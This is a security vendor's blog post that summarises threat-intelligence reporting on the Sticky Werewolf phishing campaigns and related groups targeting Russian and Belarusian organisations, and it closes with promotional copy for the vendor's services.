Blog categories
Weekly newsletter
No spam. Just the latest releases and tips, interesting articles, and exclusive interviews in your inbox every week.
Latest from the blog
Expanding Cyber Threats: Sticky Werewolf Targets Russia and Belarus
Posted on: 11 Jun 2024 | Author: Foresiet
Introduction
The cyber threat landscape is constantly evolving, with new threat actors emerging and expanding their targets. Cybersecurity researchers have recently revealed information about a threat actor named Sticky Werewolf, who has been associated with cyber attacks on organizations in Russia and Belarus. This development highlights the critical need for robust cybersecurity measures, including stolen credentials detection, darknet monitoring services, and dark web surveillance.
Sticky Werewolf's Expanding Reach
Sticky Werewolf has shifted its focus from targeting government organizations to a broader range of entities, including a pharmaceutical company, a Russian research institute involved in microbiology and vaccine development, and the aviation sector. These phishing attacks represent an expansion of the threat actor’s initial targets.
In earlier campaigns, the attack sequence started with phishing emails that included a link to download a malicious file from sites like gofile.io. In the most recent campaign, the attackers used archive files with LNK files that were directed to a payload hosted on WebDAV servers.
Evolution of the Attack Chain
Sticky Werewolf’s tactics have evolved, now employing RAR archive attachments that contain two LNK files and a decoy PDF document. The decoy, disguised as an invitation to a video conference, urges recipients to click on the LNK files to access the meeting agenda and email distribution list. Opening these LNK files triggers the execution of a binary hosted on a WebDAV server, launching an obfuscated Windows batch script. This script runs an AutoIt script that injects the final payload while bypassing security software and analysis attempts.
“This executable is an NSIS self-extracting archive, part of a previously known crypter named CypherIT,”. “While the original CypherIT crypter is no longer being sold, the current executable is a variant of it, as observed in a couple of hacking forums.
The ultimate goal of these attacks is to deliver commodity remote access trojans (RATs) and information stealer malware such as Rhadamanthys and Ozone RAT.
Broader Cybersecurity Context
As affiliates of LockBit, Astamirov and Vasiliev identified and exploited vulnerable computer systems. They deployed ransomware to encrypt data, demanding ransoms for decryption and the promise to delete exfiltrated information. If victims refused to pay, their data remained encrypted, and the stolen data was published on LockBit’s dark web leak site. This highlights the importance of robust digital footprint analysis and brand protection to mitigate such threats.
Geopolitical Implications
While there is no definitive evidence pointing to a specific national origin for Sticky Werewolf, the geopolitical context suggests possible links to a pro-Ukrainian cyberespionage group or hacktivists. However, this attribution remains uncertain.
Recent developments also include BI.ZONE’s discovery of an activity cluster named Sapphire Werewolf, responsible for over 300 attacks on Russian education, manufacturing, IT, defense, and aerospace engineering sectors. These attacks utilized Amethyst, an offshoot of the open-source SapphireStealer.
Additionally, clusters referred to as Fluffy Wolf and Mysterious Werewolf have been uncovered, using spear-phishing lures to distribute various malware, including Remote Utilities, XMRig miner, WarZone RAT, and a bespoke backdoor dubbed RingSpy. According to BI.ZONE, the RingSpy backdoor allows attackers to execute commands remotely, retrieve the results, and download files from network resources. “The backdoor’s [command-and-control] server is a Telegram bot.”
Conclusion
The expanding reach and evolving tactics of threat actors like Sticky Werewolf highlight the dynamic nature of cybersecurity threats. Organizations must prioritize advanced security measures such as stolen credentials detection, darknet monitoring services, and dark web surveillance. Implementing comprehensive digital footprint analysis, brand protection, and brand impersonation defense strategies is crucial to safeguarding against these sophisticated cyber threats. Moreover, online risk evaluation and digital threat scoring can help organizations stay ahead of potential threats, ensuring robust protection in an increasingly hostile digital environment. Stay vigilant and prioritize security to safeguard against these formidable adversaries.
About Foresiet!
Foresiet is the pioneering force in digital security solutions, offering the first integrated Digital Risk Protection SaaS platform. With 24x7x365 dark web monitoring and proactive threat intelligence, Foresiet safeguards against data breaches and intellectual property theft. Our robust suite includes brand protection, takedown services, and supply chain assessment, enhancing your organization’s defense mechanisms. Attack surface management is a key component of our approach, ensuring comprehensive protection across all vulnerable points. Compliance is assured through adherence to ISO27001, NIST, GDPR, PCI, SOX, HIPAA, SAMA, CITC, and Third Party regulations. Additionally, our advanced antiphishing shield provides unparalleled protection against malicious emails. Trust Foresiet to empower your organization to navigate the digital landscape securely and confidently.
Latest
From the blog
The latest industry news, interviews, technologies, and resources.
2 Responses